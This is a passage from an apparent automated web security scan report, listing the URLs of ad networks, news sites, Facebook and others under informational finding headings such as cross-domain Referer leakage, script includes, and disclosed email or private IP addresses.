12.35. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662

12.36. http://r1-ads.ace.advertising.com/site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html

12.37. http://sales.liveperson.net/hc/76226072/

12.38. http://segment-pixel.invitemedia.com/set_partner_uid

12.39. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.40. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.41. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.42. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.43. http://sync.mathtag.com/sync/img

12.44. http://t.mookie1.com/t/v1/imp

12.45. http://tags.bluekai.com/site/2736

12.46. http://tags.bluekai.com/site/2751

12.47. http://user.lucidmedia.com/clicksense/user

12.48. http://www.ask.com/about/help

12.49. http://www.ask.com/about/help/webmasters

12.50. http://www.ask.com/about/legal/ask-site-policies

12.51. http://www.ask.com/about/legal/privacy

12.52. http://www.ask.com/news

12.53. http://www.ask.com/pictures

12.54. http://www.ask.com/products/display

12.55. http://www.ask.com/settings

12.56. http://www.ask.com/staticcontent/about/helpcenter/about_helpcenter_helpcenter

12.57. http://www.ask.com/staticcontent/about/helpcenter/about_helpcenter_webmaster

12.58. http://www.ask.com/staticcontent/about/legal/about_legal_notices

12.59. http://www.ask.com/web

12.60. http://www.att.com/homepage/sitemap/

12.61. http://www.bizographics.com/collect/

12.62. http://www.facebook.com/ConanTheBarbarian

12.63. http://www.facebook.com/home.php

12.64. http://www.facebook.com/home.php

12.65. http://www.facebook.com/login.php

12.66. http://www.facebook.com/media/set/

12.67. http://www.facebook.com/profile.php

12.68. http://www.flickr.com/flanal_event.gne

12.69. http://www.imdb.com/

12.70. http://www.imdb.com/tv/widget/grid

12.71. http://www.wireless.att.com//store_maintenance/images/att_logo.gif

12.72. http://www.wireless.att.com//store_maintenance/images/globemaintenance.gif

12.73. http://www.wireless.att.com//store_maintenance/images/page_midSlice.gif

12.74. http://www.wireless.att.com//store_maintenance/images/page_topSlice.gif

12.75. http://www.wireless.att.com/cell-phone-service/legal/return-policy.jsp

12.76. http://www.wireless.att.com/cell-phone-service/packages/N

12.77. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp

12.78. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp

12.79. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp

12.80. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

12.81. http://www.wireless.att.com/store_maintenance/images/globemaintenance.gif

12.82. http://www.wireless.att.com/store_maintenance/images/page_btmSlice.gif

12.83. http://www.wireless.att.com/store_maintenance/images/page_midSlice.gif

12.84. http://wzus1.ask.com/i/i.gif

13. Cross-domain Referer leakage

13.1. http://a2.mediagra.com/b.php

13.2. http://a5.mediagra.com/b.php

13.3. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.7

13.4. http://ad.doubleclick.net/adi/amzn.us.house.redirect/

13.5. http://ad.doubleclick.net/adj/imdb2.consumer.main/showtimes

13.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**

13.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

13.8. http://ads.tw.adsonar.com/adserving/getAds.jsp

13.9. http://afe.specificclick.net/serve/v=5

13.10. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358

13.11. http://banners.bookofsex.com/go/page/iframe_cm_26400

13.12. http://banners.bookofsex.com/go/page/iframe_cm_26400

13.13. http://bp.specificclick.net/

13.14. http://bpx.a9.com/ads/getad

13.15. http://ca.rtb.prod2.invitemedia.com/build_creative

13.16. http://ca.rtb.prod2.invitemedia.com/build_creative

13.17. http://choices.truste.com/ca

13.18. http://cm.g.doubleclick.net/pixel

13.19. http://cm.g.doubleclick.net/pixel

13.20. http://cm.g.doubleclick.net/pixel

13.21. http://creativeby1.unicast.com/assets/A250/N27522/M14414/P702/Q75332/script_300_250.js

13.22. http://googleads.g.doubleclick.net/pagead/ads

13.23. http://hire.jobvite.com/CompanyJobs/Careers.aspx

13.24. http://hire.jobvite.com/widget20.js

13.25. http://i.cdn.turner.com/cnn/.element/js/3.0/video/cvp_suppl.js

13.26. http://ifa.camads.net/dif/

13.27. http://mediacdn.disqus.com/1313183665/build/system/disqus.js

13.28. http://medleyads.com/spot/5022.html

13.29. http://medleyads.com/spot/5023.html

13.30. http://money.cnn.com/.element/ssi/video/5.1/players/story.player.html

13.31. http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm

13.32. http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm

13.33. http://news.soso.com/n.q

13.34. http://platform.twitter.com/widgets/follow_button.html

13.35. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.36. http://soso.qq.com/news.q

13.37. http://soso.qq.com/news.q

13.38. http://streamate.doublepimp.com/r.poptracking

13.39. http://svcs.cnn.com/weather/getForecast

13.40. http://syndication.exoclick.com/ads-iframe-display.php

13.41. http://syndication.exoclick.com/ads-iframe-display.php

13.42. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/

13.43. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/

13.44. http://www.ask.com/news

13.45. http://www.ask.com/pictures

13.46. http://www.ask.com/web

13.47. http://www.cnn.com/.element/ssi/misc/3.0/editionvars.html

13.48. http://www.facebook.com/ConanTheBarbarian

13.49. http://www.facebook.com/media/set/

13.50. http://www.facebook.com/plugins/like.php

13.51. http://www.facebook.com/plugins/likebox.php

13.52. http://www.facebook.com/widgets/like.php

13.53. http://www.imdb.com/tv/widget/grid

13.54. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp

13.55. http://www.wireless.att.com/store_maintenance/images/globemaintenance.gif

13.56. http://www.wireless.att.com/store_maintenance/images/page_midSlice.gif

13.57. http://www.xhamstercams.com/cam/Juicy_Jules19/

13.58. http://www.zedo.com/shared/commonHeader.htm

13.59. http://wzus1.ask.com/r

13.60. http://xhamster.com/signup.php

14. Cross-domain script include

14.1. http://a2.mediagra.com/b.php

14.2. http://a5.mediagra.com/b.php

14.3. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.7

14.4. http://ad.doubleclick.net/adi/amzn.us.house.redirect/

14.5. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442

14.6. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693

14.7. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354

14.8. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274

14.9. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks¶ms.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627

14.10. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&domId=566446&page.allowcompete=yes&domId=566446

14.11. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072

14.12. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html

14.13. http://afe.specificclick.net/serve/v=5

14.14. http://answers.ask.com/

14.15. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358

14.16. http://googleads.g.doubleclick.net/pagead/ads

14.17. http://graphics.friendfinder.com/javascript/live/ff-domLoadEvent-1284506173.js

14.18. http://hire.jobvite.com/CompanyJobs/Careers.aspx

14.19. http://hire.jobvite.com/widget20.js

14.20. http://ipr.cntv.cn/english/group/index.shtml

14.21. http://ipr.cntv.cn/english/no1/index.shtml

14.22. http://medleyads.com/spot/5022.html

14.23. http://money.cnn.com/.element/ssi/video/5.1/players/story.player.html

14.24. http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm

14.25. http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm

14.26. http://news.soso.com/n.q

14.27. http://pop6.com/p/memsearch.cgi

14.28. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662

14.29. http://static.xhamster.com/js/statcounter.js

14.30. http://svcs.cnn.com/weather/getForecast

14.31. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/

14.32. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/

14.33. http://www.cnn.com/

14.34. http://www.cnn.com/.element/ssi/misc/3.0/editionvars.html

14.35. http://www.facebook.com/ConanTheBarbarian

14.36. http://www.facebook.com/login.php

14.37. http://www.facebook.com/media/set/

14.38. http://www.facebook.com/plugins/likebox.php

14.39. http://www.imdb.com/

14.40. http://www.ipraction.cn/

14.41. http://www.mediafire.com/

14.42. https://www.redhat.com/wapps/store/cart.html

14.43. http://www.tudou.com/

14.44. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp

14.45. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp

14.46. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp

14.47. http://www.xhamstercams.com/cam/Juicy_Jules19/

14.48. http://www.zedo.com/

14.49. http://www.zedo.com/shared/commonHeader.htm

15. Email addresses disclosed

15.1. http://graphics.friendfinder.com/images/js/AjaxRequest-compact.js

15.2. http://hire.jobvite.com/CompanyJobs/careers_8.js

15.3. http://mediacdn.disqus.com/1313183665/build/system/disqus.js

15.4. http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm

15.5. http://news.google.com/

15.6. http://sp.ask.com/en/docs/a14/about/legal/privacy_policy_v1_9.html

15.7. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/

15.8. http://w.sharethis.com/button/buttons.js

15.9. http://www.ask.com/about/help

15.10. http://www.ask.com/about/help/webmasters

15.11. http://www.ask.com/about/legal/ask-site-policies

15.12. http://www.ask.com/staticcontent/about/legal/about_legal_notices

15.13. http://www.imdb.com/showtimes/

15.14. http://www.imdb.com/showtimes/title/tt1650062/

15.15. http://www.redhat.com/j/jquery.hoverIntent.minified.js

15.16. https://www.redhat.com/j/controls.js

15.17. https://www.redhat.com/j/dragdrop.js

15.18. https://www.redhat.com/j/jquery.hoverIntent.minified.js

15.19. http://www.sohu.com/

15.20. http://www.wireless.att.com/cell-phone-service/scripts/base.js

15.21. http://www.zedo.com/

16. Private IP addresses disclosed

16.1. http://external.ak.fbcdn.net/safe_image.php

16.2. http://external.ak.fbcdn.net/safe_image.php

16.3. http://external.ak.fbcdn.net/safe_image.php

16.4. http://external.ak.fbcdn.net/safe_image.php

16.5. http://external.ak.fbcdn.net/safe_image.php

16.6. http://external.ak.fbcdn.net/safe_image.php

16.7. http://external.ak.fbcdn.net/safe_image.php

16.8. http://external.ak.fbcdn.net/safe_image.php

16.9. http://external.ak.fbcdn.net/safe_image.php

16.10. http://external.ak.fbcdn.net/safe_image.php

16.11. http://news.soso.com/n.q

16.12. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yP/r/C1LO4_1OOg0.png

16.13. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yS/r/SakaC0tDjfm.png

16.14. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yb/r/OvXYjXPaGkl.png

16.15. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yr/r/fwJFrO5KjAQ.png

16.16. http://pt-br.facebook.com/ajax/captcha/recaptcha_log_actions.php

16.17. http://pt-br.facebook.com/favicon.ico

16.18. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662

16.19. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

16.20. http://static.ak.facebook.com/platform/page_proxy.php

16.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

16.22. http://static.ak.fbcdn.net/connect/xd_proxy.php

16.23. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ARVKHdmDbiC.png

16.24. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/_ev5gLu-ABH.css

16.25. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/0KvtPpJJZJB.js

16.26. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/79x_K5xzjuK.png

16.27. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/RHjwNbYNCek.js

16.28. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/mVJg8S3A2Rm.css

16.29. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/yCyTimbRkBE.js

16.30. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Dg8YLPWKyk7.css

16.31. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/dBNzZ9AtCWo.js

16.32. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/gvrW9GGxv2y.css

16.33. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/mD1E478qJLC.png

16.34. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/0k5dcVwtJQr.js

16.35. http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/LzAFHbTKrbn.js

16.36. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/OpolsLVhFVH.js

16.37. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/WR6YXci7s1F.css

16.38. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/foOlSPGxMgD.css

16.39. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/H9GMoKDdPbt.css

16.40. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/1xbEnWOvBF3.js

16.41. http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif

16.42. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/iXI7kq8F8Uu.png

16.43. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/72NZsnqjQ5t.js

16.44. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/2p1GVwLpsud.css

16.45. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/JKQSEcToESS.css

16.46. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/TK1srIkMgP5.js

16.47. http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/wQ6daFs36J_.css

16.48. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vIpx6O3T-P_.css

16.49. http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/BawGDULIRtU.css

16.50. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/T1nBWlouv6j.css

16.51. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/gjR314n9JTe.css

16.52. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/ofNbJ9YoFJM.css

16.53. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/K1vbE3QBhxb.js

16.54. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/z1xzUcShxUD.png

16.55. http://www.facebook.com/ConanTheBarbarian

16.56. http://www.facebook.com/ConanTheBarbarian

16.57. http://www.facebook.com/extern/login_status.php

16.58. http://www.facebook.com/extern/login_status.php

16.59. http://www.facebook.com/extern/login_status.php

16.60. http://www.facebook.com/extern/login_status.php

16.61. http://www.facebook.com/extern/login_status.php

16.62. http://www.facebook.com/extern/login_status.php

16.63. http://www.facebook.com/extern/login_status.php

16.64. http://www.facebook.com/home.php

16.65. http://www.facebook.com/home.php

16.66. http://www.facebook.com/images/loaders/indicator_black.gif

16.67. http://www.facebook.com/images/spacer.gif

16.68. http://www.facebook.com/login.php

16.69. http://www.facebook.com/media/set/

16.70. http://www.facebook.com/plugins/like.php

16.71. http://www.facebook.com/plugins/like.php

16.72. http://www.facebook.com/plugins/like.php

16.73. http://www.facebook.com/plugins/like.php

16.74. http://www.facebook.com/plugins/like.php

16.75. http://www.facebook.com/plugins/like.php

16.76. http://www.facebook.com/plugins/like.php

16.77. http://www.facebook.com/plugins/likebox.php

16.78. http://www.facebook.com/profile.php

16.79. http://www.facebook.com/widgets/like.php

16.80. http://www.facebook.com/widgets/like.php

17. Robots.txt file

17.1. http://api.recaptcha.net/challenge

17.2. http://at-img2.tdimg.com/sales/material/2011/0728/1311852230142.swf

17.3. http://at-img3.tdimg.com/sales/material/2011/0729/1311932714659.swf

17.4. http://at-img4.tdimg.com/crossdomain.xml

17.5. http://stat.tudou.com/newstat/pv

17.6. http://toolbarqueries.clients.google.com/tbproxy/af/query

17.7. http://www.xhamstercams.com/cam/Juicy_Jules19/

17.8. http://xhamster.com/signup.php

18. HTML does not specify charset

18.1. http://a2.mediagra.com/b.php

18.2. http://a5.mediagra.com/b.php

18.3. http://ad.doubleclick.net/adi/amzn.us.house.redirect/

18.4. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes¶ms.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525

18.5. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes¶ms.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492

18.6. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790

18.7. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph¶ms.styles=fs&domId=177939&page.allowcompete=yes&domId=177939

18.8. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756

18.9. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756

18.10. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442

18.11. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693

18.12. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773

18.13. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339

18.14. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354

18.15. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274

18.16. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255

18.17. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796

18.18. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470

18.19. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

18.20. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

18.21. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

18.22. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

18.23. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon5&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

18.24. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962

18.25. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845

18.26. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777

18.27. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541

18.28. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469

18.29. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469

18.30. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469

18.31. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news¶ms.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066

18.32. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks¶ms.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627

18.33. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology¶ms.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857

18.34. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&domId=566446&page.allowcompete=yes&domId=566446

18.35. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072

18.36. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053

18.37. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472

18.38. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898

18.39. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939

18.40. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248

18.41. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067

18.42. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091

18.43. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981

18.44. http://bpx.a9.com/amzn/defaultad.html

18.45. http://bpx.a9.com/amzn/iframe.html

18.46. http://ca.rtb.prod2.invitemedia.com/build_creative

18.47. http://creativeby1.unicast.com/script/V3.00/deliver2.html

18.48. http://d3.zedo.com/jsc/d3/bh.html

18.49. http://js.adsonar.com/js/pass.html

18.50. http://mediacdn.disqus.com/1313183665/build/system/def.html

18.51. http://mediacdn.disqus.com/1313183665/build/system/reply.html

18.52. http://medleyads.com/spot/1082.html

18.53. http://medleyads.com/spot/5022.html

18.54. http://medleyads.com/spot/5023.html

18.55. http://medleyads.com/spot/5232.html

18.56. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.economy.html

18.57. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.fortune.html

18.58. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.leadership.html

18.59. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.markets.html

18.60. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.money.html

18.61. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.news.html

18.62. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.pf.html

18.63. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.smallbusiness.html

